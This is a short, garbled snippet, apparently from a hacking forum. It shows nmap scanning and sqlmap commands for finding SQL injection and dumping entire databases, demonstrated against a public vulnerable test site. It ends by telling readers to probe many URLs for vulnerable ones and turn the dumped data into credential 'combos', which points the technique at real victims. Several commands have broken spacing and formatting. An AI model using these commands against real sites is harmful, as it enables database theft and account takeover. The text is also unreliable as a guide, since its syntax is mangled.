nmap -v 192.168.10.0/24[/color]
would scan the 256 hosts between 192.168.10.0 and 192.168.10.255
nmap -sV --script=http-sql-injectionwww.testphp.vulnweb.com–p 80
if possible SQL injection for queries using this command, useSQLMAPcommand try to find out entire data under this URL by typing
sqlmap -u "http://testphp.vulnweb.com/search.php?test=query%27%200R%20sqlspider" -D acuart --dump-all
the resulting DB will be extracted to the folder of sqlmap script.
you have to test on multiple URls to find vulnerable one, and then you get raw data to make your own combos !!
